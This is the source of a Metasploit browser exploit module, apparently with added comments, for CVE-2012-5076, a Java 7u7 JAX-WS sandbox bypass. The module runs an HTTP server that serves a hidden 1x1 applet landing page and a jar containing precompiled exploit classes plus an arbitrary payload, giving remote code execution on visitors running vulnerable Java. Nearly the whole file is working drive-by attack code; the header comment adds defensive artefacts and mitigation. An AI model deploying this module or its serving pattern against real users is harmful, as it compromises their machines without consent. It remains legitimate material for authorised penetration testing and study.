
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_jaxws.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
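# Browser exploit module for CVE-2012-5076 (JAX-WS sandbox bypass, Java 7u7 and
# earlier, fixed by the Oracle October 2012 CPU listed under 'References').
#
# Serving model: the module runs an HTTP server; a request for the resource
# returns a landing page containing a 1x1 <applet> element whose archive is a
# randomly named .jar and whose entry class is Exploit.class, and a request
# ending in ".jar" returns the payload jar with the precompiled class files
# from data/exploits/cve-2012-5076 added. From a defensive standpoint the
# observable artefacts are that applet element, the Exploit.class /
# MyPayload.class entries, and a jar served as application/octet-stream;
# mitigation is updating the JRE or disabling the browser Java plugin.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  #include Msf::Exploit::Remote::BrowserAutopwn
  #autopwn_info({ :javascript => false })

  # Registers module metadata with the framework.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Java Applet JAX-WS Remote Code Execution',
      'Description' => %q{
        This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
        code outside of the sandbox as exploited in the wild in November of 2012. The
        vulnerability affects Java version 7u7 and earlier.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Unknown', # Vulnerability Discovery
          'juan vazquez' # metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2012-5076' ],
          [ 'OSVDB', '86363' ],
          [ 'BID', '56054' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ],
          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2012/11/15/a-technical-analysis-on-new-java-vulnerability-cve-2012-5076.aspx' ]
        ],
      'Platform' => %w{ java win },
      'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ],
          [ 'Linux x86',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2012-10-16'
    ))
  end

  # HTTP request handler. Requests whose URI ends in ".jar" receive the applet
  # jar built from the current payload; every other request is handled by
  # serve_landing_page (redirect to the trailing-slash form, or the HTML page).
  #
  # @param cli [Rex::Socket::Tcp] connected client socket
  # @param request [Rex::Proto::Http::Request] parsed HTTP request
  # @return [void]
  def on_request_uri(cli, request)
    # \z rather than $ so an embedded newline in the URI cannot satisfy the
    # "ends with .jar" routing test.
    return serve_landing_page(cli, request) unless request.uri =~ /\.jar\z/i

    jar = build_applet_jar(regenerate_payload(cli))

    print_status("Sending Applet.jar")
    send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })

    handler(cli)
  end

  # Builds the landing page: a 1x1 applet element whose archive attribute is a
  # randomly named jar (3..8 alpha characters plus ".jar", answered by
  # on_request_uri) and whose entry class is Exploit.class.
  #
  # @return [String] the HTML document
  def generate_html
    jar_name = rand_text_alpha(rand(3..8)) + ".jar"
    "<html><head></head>" \
      "<body>" \
      "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">" \
      "</applet></body></html>"
  end

  private

  # Handles every non-jar request: a URI without a trailing slash is redirected
  # to the slash form (so the relative jar name in the applet tag resolves
  # under this resource); otherwise the HTML landing page is sent.
  #
  # @param cli [Rex::Socket::Tcp] connected client socket
  # @param request [Rex::Proto::Http::Request] parsed HTTP request
  # @return [void]
  def serve_landing_page(cli, request)
    unless request.uri =~ %r{/\z}
      send_redirect(cli, get_resource + '/', '')
      return
    end

    print_status("#{self.name} handling request")
    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
  end

  # Adds the precompiled class files shipped under data/exploits/cve-2012-5076
  # to the payload's encoded jar.
  #
  # @param payload [Msf::Payload] payload instance whose encoded_jar is extended
  # @return [Rex::Zip::Jar] the jar with Exploit.class and MyPayload.class added
  def build_applet_jar(payload)
    jar = payload.encoded_jar
    class_dir = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5076")
    # Each entry is a jar path split into components; nested paths get their
    # parent directory entries created first.
    class_paths = [
      [ "Exploit.class" ],
      [ "MyPayload.class" ]
    ]

    class_paths.each do |path|
      add_parent_dirs(jar, path)
      # File.binread closes the file even if the read raises; the previous
      # File.open/read/close sequence leaked the descriptor on error.
      jar.add_file(path.join("/"), File.binread(File.join(class_dir, *path)))
    end

    jar
  end

  # Creates a directory entry in the jar for every proper prefix of a nested
  # path that is not already present. Single-component paths need none.
  #
  # @param jar [Rex::Zip::Jar] jar being built
  # @param path [Array<String>] path components of the entry about to be added
  # @return [void]
  def add_parent_dirs(jar, path)
    existing = jar.entries.map(&:name)
    1.upto(path.length - 1) do |idx|
      dir = path[0, idx].join("/") + "/"
      jar.add_file(dir, '') unless existing.include?(dir)
    end
  end
end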